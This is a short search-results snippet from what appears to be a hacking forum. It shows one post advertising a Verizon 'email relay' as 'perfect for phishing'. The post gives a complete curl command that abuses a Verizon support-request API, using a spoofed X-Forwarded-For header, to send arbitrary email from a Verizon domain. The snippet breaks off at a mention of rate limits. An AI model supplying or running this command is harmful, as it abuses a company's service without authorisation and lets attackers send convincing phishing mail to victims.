Search results

  1. K

    Verizon Email Relay - Perfect for Phishing

    You can send emails from Verizon domain using this technique: curl -X POST "https://thingspace.verizon.com/sso/ui/api/user/supportRequest" -H "Content-Type: application/json" -H "X-Forwarded-For: 127.0.0.1" -d '{"to":"[email protected]","subject":"Subject","body":"Body"}' Rate Limit...
Top Bottom